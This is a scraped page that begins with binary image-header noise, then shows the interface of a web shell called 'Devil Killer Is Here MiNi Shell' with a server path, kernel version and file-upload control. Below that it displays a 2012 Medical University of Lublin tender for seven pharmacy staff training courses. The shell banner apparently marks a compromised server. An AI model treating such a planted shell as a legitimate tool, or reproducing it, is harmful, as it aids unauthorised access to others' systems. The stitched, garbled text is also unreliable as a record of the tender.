JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120131/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120131/26191-N-2012.html

<p class="kh_header"><b>Lublin: Przeprowadzenie 7 kursów szkoleniowych dla pracowników naukowo-dydaktycznych Wydziału Farmaceutycznego (z podziałem zamówienia na 7 części - zadania); nr sprawy UM-ZP-262-8/12</b><br>
<b>Numer ogłoszenia: 26191 - 2012; data zamieszczenia: 31.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny w Lublinie , Al. Racławickie 1, 20-059 Lublin, woj. lubelskie, tel. 81 528 88 88, faks 81 528 89 18.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umlub.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie 7 kursów szkoleniowych dla pracowników naukowo-dydaktycznych Wydziału Farmaceutycznego (z podziałem zamówienia na 7 części - zadania); nr sprawy UM-ZP-262-8/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa szkoleniowa polegająca na przeprowadzeniu 7 kursów szkoleniowych dla pracowników naukowo-daktycznych Wydziału Farmaceutycznego, z podziałem zamówienia na 7 części:
Zadanie 1. Przeprowadzenie kursu szkoleniowego dla pracowników naukowo-dydaktycznych Wydziału Farmaceutycznego w zakresie analizy GC w układzie EI, CI-QQQ-MS/MS.
Zadanie 2. Przeprowadzenie kursu dla pracowników naukowo-dydaktycznych Wydziału Farmaceutycznego na temat nowoczesnych metod spektroskopowych w analizie związków organicznych.
Zadanie 3. Przeprowadzenie kursu szkoleniowego dla pracowników naukowo-dydaktycznych Wydziału Farmaceutycznego w zakresie analizy LC w połączeniu w układzie ESI-QTOF-MS.
Zadanie 4. Przeprowadzenie kursu szkoleniowego dla pracowników naukowo-dydaktycznych Wydziału Farmaceutycznego w zakresie analizy UPLC w układzie ESI- MS/MS typu potrójny kwadrupol z pułapką jonową.
Zadanie 5. Przeprowadzenie kursu szkoleniowego dla pracowników naukowo-dydaktycznych Wydziału Farmaceutycznego w zakresie organizacji i dokumentacji nowoczesnego laboratorium. System zapewnienia jakości. Walidacja.
Zadanie 6. Przeprowadzenie kursu szkoleniowego dla pracowników naukowo-dydaktycznych Wydziału Farmaceutycznego w zakresie stosowania programów statystycznych.
Zadanie 7. Przeprowadzenie kursu szkoleniowego dla pracowników naukowo-dydaktycznych Wydziału Farmaceutycznego w zakresie interpretacji wyników otrzymanych w zaawansowanych technikach spektroskopowych (widma UV, FTIR, MS, Raman, NMR).

2. Zajęcia prowadzone będą w języku polskim.
3. Wykonawca przygotuje materiały szkoleniowe oraz przygotuje program zajęć z zakresu prowadzonego szkolenia oraz wystawi zaświadczenia o odbyciu kursu dla uczestników.
4. Wykonawca we własnym zakresie i własnym staraniem zapewni dla poszczególnych zadań, sprzęt i materiały niezbędne do właściwej i należytej realizacji usługi przeprowadzenia szkoleń, a w odniesieniu do Zadań nr 1, 3, 4, 5, 6, zobowiąże się wykorzystać w trakcie szkoleń sprzęt będący w posiadaniu Zamawiającego i udostępniany przez Zamawiającego.

5. Szczegółowy opis przedmiotu zamówienia zawarto w specyfikacji istotnych warunków zamówienia (SIWZ) dostępnej pod wskazanym wyżej adresem i na stronie internetowej www.umlub.pl.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7, 80.32.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Brak wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Uprawnienia do wykonywania określonej działalności lub czynności nie są w przypadku niniejszego zamówienia wymagane. Jednakże zamawiający zastrzega, że o udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy dopuszczeni do ubiegania się o zamówienie publiczne w świetle przepisów ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.), zwanej dalej Pzp, w szczególności niepodlegający wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Pzp.
Ponadto zgodnie z art. 22 ust. 1 i 4 Pzp, za zdolnego do wykonania niniejszego zamówienia zamawiający uznaje i dopuści do udziału w postępowaniu, wykonawcę spełniającego opisane niżej, w pkt III.3.2) i n., odpowiednio dla poszczególnych zadań, warunki.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Zadanie nr 5 - posiadającego doświadczenie w realizacji, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej 3 szkoleń w zakresie organizacji i dokumentacji nowoczesnego laboratorium o wartości min. 50 000 zł każde. 

2)	Zadanie nr 6 - posiadającego doświadczenie w realizacji, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie,  co najmniej 10 szkoleń z zakresu statystyki - dla przemysłu farmaceutycznego lub na potrzeby badań medycznych,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za zdolnego do wykonania zamówienia w poszczególnych zadaniach uzna się wykonawcę:


1) Zadanie nr 1 - dysponującego, co najmniej jedną osobą zdolną do wykonania zamówienia, tj. osobą:
a)	legitymującą się certyfikatem znajomości aparatury i oprogramowania w zakresie analizy GC w połączeniu EI, CI-QQQ-MS/MS; 
b)	posiadającą co najmniej 5-letnie doświadczenie zawodowe (praktyczne lub naukowo-badawcze) w zakresie analizy GC w połączeniu EI, CI-QQQ-MS/MS;
c)	legitymującą się przeprowadzeniem co najmniej 8 szkoleń w zakresie analizy GC w połączeniu EI, CI-QQQ-MS/MS oraz interpretacji widm masowych leków, produktów rozkładu i metabolitów; 

2) Zadanie nr 2 - dysponującego, co najmniej jedną osobą zdolną do wykonania zamówienia, tj. osobą:
a)	posiadającą co najmniej stopień naukowy doktora habilitowanego nauk chemicznych lub farmaceutycznych;
b)	będącą autorem lub współautorem co najmniej 5 publikacji naukowych w dziedzinie analizy substancji roślinnych, z których co najmniej jedna dotyczy związków z grupy polifenoli (fenolokwasy, flawonoidy itp.) - opublikowanych w czasopismach z tzw. listy filadelfijskiej
c)	posiadającą co najmniej 5-letnie doświadczenie dydaktyczne na wyższych uczelniach. 
d)	legitymującą się odbytymi stażami w krajowych i zagranicznych placówkach naukowych prowadzących badania w dziedzinie spektrometrii mas.
e)	posiadającą co najmniej 8-letnie doświadczenie zawodowe (praktyczne i/lub naukowo-badawcze) w pracy na spektrometrach masowych w zakresie analizy naturalnych substancji roślinnych.


3) Zadanie nr 3 - dysponującego, co najmniej jedną osobą zdolną do wykonania zamówienia, tj. osobą:
a)	legitymującą się certyfikatem znajomości aparatury i oprogramowania w zakresie analizy LC w połączeniu w układzie ESI-QTOF-MS 
b)	legitymującą się biegłą znajomością oprogramowania MassHunter Metabolite ID Mass Profiler 
c)	posiadającą co najmniej 3-letnie doświadczenie zawodowe (praktyczne lub naukowo-badawcze) w zakresie analizy LC w połączeniu w układzie ESI-QTOF-MS 
d)	legitymującą się przeprowadzeniem co najmniej 5 szkoleń w zakresie analizy LC w połączeniu w układzie ESI-QTOF-MS oraz interpretacji widm masowych leków, produktów rozkładu i metabolitów.

4) Zadanie nr 4 - dysponującego, co najmniej jedną osobą zdolną do wykonania zamówienia, tj. osobą:

a)	posiadającą co najmniej stopień naukowy doktora nauk chemicznych lub farmaceutycznych, specjalizującą się w spektrometrii mas;
b)	posiadającą co najmniej 5-letnie doświadczenie zawodowe (praktyczne lub naukowo-badawcze) w pracy związanej ze spektrometrami mas i stosowaniem QTRAP oraz programu Analyst, w tym znajomość wersji 1.5;
c)	posiadającą co najmniej 5-letnie doświadczenie zawodowe (praktyczne lub naukowo-badawcze) w stosowaniu techniki LC/MS w zakresie analizy związków organicznych, w tym także roślinnych;
d)	posiadającą co najmniej 3-letnie doświadczenie dydaktyczne w prowadzeniu zajęć z zakresu spektrometrii mas;
e)	legitymującą się przeprowadzeniem co najmniej 8 szkoleń w zakresie analizy LC  MS oraz interpretacji widm masowych związków organicznych i produktów ich rozkładu.

5) Zadanie nr 5 - dysponującego, co najmniej 1 osobą zdolną do wykonania zamówienia, tj. osobą:
a)	posiadającą doświadczenie w realizacji co najmniej 10 szkoleń dla branży farmaceutycznej w przedmiocie organizacji i dokumentacji nowoczesnego laboratorium, zakończonych nie wcześniej niż trzy lata przed dniem składania ofert,
b)	posiadającą doświadczenie w przeprowadzeniu (w roli wykładowcy) co najmniej 10 szkoleń w zakresie wdrażania procedur i dokumentacji GMP oraz GLP, prowadzenia dokumentacji Pionu Kontroli Jakości (KJ), zatwierdzania specyfikacji, instrukcji, metod badań oraz innych procedur KJ.

6) Zadanie nr 6 - dysponującego, co najmniej 1 osobą zdolną do wykonania zamówienia, tj. osobą, która posiada doświadczenie w przeprowadzeniu (w roli wykładowcy) co najmniej 3 szkoleń z zakresu analizy danych, metod statystycznych z wykorzystaniem oprogramowania Statistica 10.


7) Zadanie nr 7 - dysponującego, co najmniej jedną osobą zdolną do wykonania zamówienia, tj. osobą:
a)	posiadającą co najmniej stopień naukowy doktora nauk chemicznych lub farmaceutycznych,
b)	legitymującą się praktyczną znajomością metod spektroskopowych ze szczególnym uwzględnieniem spektrometrii mas (GC-MS, LC-MS), spektrometrii NMR, spektrometrii FTIR (techniki: transmisja, ATR, PAS, DRIFT), mikroskopii w podczerwieni, spektrometrii Ramana (dyspersyjny i FT Raman), dyfraktometrii monokrystalicznej zweryfikowaną praktycznym doświadczeniem zawodowym w tym zakresie, tj. posiadająca co najmniej 8-letnie doświadczenie zawodowe (praktyczne lub naukowo-badawcze) związane ze stosowaniem ww. technik,
c)	posiadającą co najmniej 10-letnie doświadczenie zawodowe w pracy w placówce naukowo-badawczej lub laboratorium analitycznym zajmującym się analizą strukturalną związków organicznych;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy dołączyć dokumenty potwierdzające umocowanie podpisujących ofertę osób do występowania w imieniu wykonawcy (np. pełnomocnictwa, dokumenty rejestracyjne, etc...).
Dot. sekcji III.4.1) - W zakresie wykazania warunków, o których mowa w art. 22 ust. 1 Pzp oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:

1)	W przypadku składania oferty w jakiejkolwiek części zamówienia: oświadczenie o spełnianiu warunków udziału w postępowaniu i braku podstaw do wykluczenia z postępowania (wzór oświadczenia - Załącznik nr 3 do SIWZ) - oświadczenie tego typu wykonawca powinien sporządzić i złożyć oddzielnie dla każdej z części zamówienia, w której składa ofertę;
2)	W przypadku składania oferty na zadanie nr 5 lub 6: odpowiedni wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, o których mowa w sekcji III.3.2) pkt 1) i 2) ogłoszenia - w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (wzór wykazu - Załącznik nr 4 do SIWZ). Dany wykaz usług dotyczących warunku, którego wykazaniu spełniania w danej części zamówienia służy, wykonawca powinien odpowiednio sporządzić i złożyć oddzielnie dla każdej z części zamówienia, w której składa ofertę;
3)	dokumenty (np. referencje) potwierdzające, że usługi wymienione w ww. wykazie zostały wykonane lub są wykonywane należycie;
4)	W przypadku składania oferty na poszczególne zadania (nr 1-7): odpowiedni wykaz osób, o których mowa w sekcji III.3.4) pkt 1)-7) ogłoszenia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia odnoszącymi się odpowiednio do wymagań stawianych tym osobom oraz informacjami o podstawie do dysponowania tymi osobami (wzór wykazu - Załącznik nr 5 do SIWZ). Dany wykaz osób dotyczących warunku, którego wykazaniu spełniania w danej części zamówienia służy, wykonawca powinien odpowiednio sporządzić i złożyć oddzielnie dla każdej z części zamówienia, w której składa ofertę;
W przypadku polegania przez wykonawcę na potencjale wiedzy i doświadczenia, potencjale technicznym oraz osobach zdolnych do wykonania zamówienia innego podmiotu, o czym stanowi art. 26 ust. 2b Pzp, wykonawca winien, w ramach wykazywania warunków udziału w postępowaniu, zgodnie z przywołanym przepisem, udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Jeżeli wykonawca, wykazując spełnianie warunków opisanych wyżej, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b Pzp, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia oświadczenia tych podmiotów o braku podstaw do wykluczenia z postępowania (według wzoru - pkt 2 Załącznika nr 3 do SIWZ) - sekcja III.4.2) ogłoszenia
Wykonawcy, o których mowa w art. 23 ust. 1 Pzp, tj. wykonawcy wspólnie ubiegający się o udzielenie zamówienia, oświadczenie, o którym mowa w sekcji III.4.1) pkt 1 ogłoszenia składają w sposób wskazany we wzorze - Załącznik nr 3 do SIWZ.
Formę i sposób przedkładania dokumentów potwierdzających spełnienie warunków udziału w postępowaniu regulują przepisy Pzp oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).
Dokumenty podmiotów zagranicznych - takie jak w przypadku podmiotów polskich</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego;
2.	Zwiększenia lub zmniejszenia się liczby planowanych godzin zajęć;
3.	Zaistnienia okoliczności (technicznych, gospodarczych itp.), których nie można było przewidzieć w chwili zawarcia umowy;
4.	Wystąpienia zdarzeń siły wyższej, jako zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia;
5.	Konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych przez strony (zmiana nie może spowodować zmiany ceny wynikającej z oferty Wykonawcy);</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umlub.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 1) j.w. 2). Osoba do kontaktu: Agnieszka Czajka, tel. (81) 528 89 67, adres e-mail: agnieszka.czajka@umlub.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2012 godzina 11:30, miejsce: Oferty należy składać w siedzibie Zamawiającego w Lublinie, Al. Racławickie 1, pokój nr 22 (Kancelaria Ogólna) lub przesyłać na podany w sekcji I.1) adres Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Specjalizacja i Kompetencje - Program rozwojowy Uniwersytetu Medycznego w Lublinie współfinansowany z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki (Priorytet IV Szkolnictwo wyższe i nauka, Działanie 4.1 Wzmocnienie i rozwój potencjału dydaktycznego uczelni oraz zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy, Poddziałanie 4.1.1 Wzmocnienie potencjału dydaktycznego uczelni).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1. Przeprowadzenie kursu szkoleniowego dla pracowników naukowo-dydaktycznych Wydziału Farmaceutycznego w zakresie analizy GC w układzie EI, CI-QQQ-MS/MS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Adresat: Pracownicy naukowo-dydaktyczni Wydziału Farmaceutycznego z Oddziałem Analityki Medycznej Uniwersytetu Medycznego w Lublinie 
Liczba uczestników: 19 pracowników UM
Forma szkolenia: Seminarium i Ćwiczenia laboratoryjne 
Sposób prowadzenia zajęć: zajęcia prowadzone będą dla czterech grup ćwiczeniowych po 4-5 osób.
Czas trwania zajęć: 18 godzin na każdą grupę ćwiczeniową - 6 godzin x 3 dni szkoleniowe. Łączny czas szkolenia: 72 godziny szkoleniowe (12 dni).
Termin szkolenia: do 29.11.2012 - dokładne terminy zajęć zostaną ustalone po podpisaniu umowy. 
Miejsce szkolenia: Zajęcia odbywać się będą w pomieszczeniach Katedry i Zakładu Chemii Leków Uniwersytetu Medycznego w Lublinie.

Zakres tematyczny szkolenia 
1 dzień - Wprowadzenie do metody GC sprzężonej ze spektrometrią mas (metody jonizacji próbki, analizatory mas, metody detekcji).
2 dzień - Metoda GC w połączeniu ze źródłem typu EI i CI oraz analizatorem masy potrójny kwadrupol (QQQ-MS/MS): podstawowe parametry techniczne, obsługa aparatu, parametry pracy analizatora QQQ-TOF i ich znaczenie, oprogramowanie MassHunter i ChemStation.
3 dzień - Szkolenie z analizy GC-EI,CI-QQQ-MS/MS oraz GC-FID wybranych substancji leczniczych, i/lub ich metabolitów oraz produktów rozkładu (leki psychotropowe, przeciwpadaczkowe, przeciwcukrzycowe)
przygotowanie próbki - mikroekstrakcja, headspace, dobór warunków analizy, optymalizacja parametrów jonizacji, pomiar dokładności masy oraz identyfikacja jakościowa analizowanych substancji; podstawowe parametry analizy ilościowej; wykorzystanie oprogramowania MassHunter i ChemStation w analizie wybranych produktów leczniczych i/lub próbek biologicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7, 80.32.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2012.</p></li>
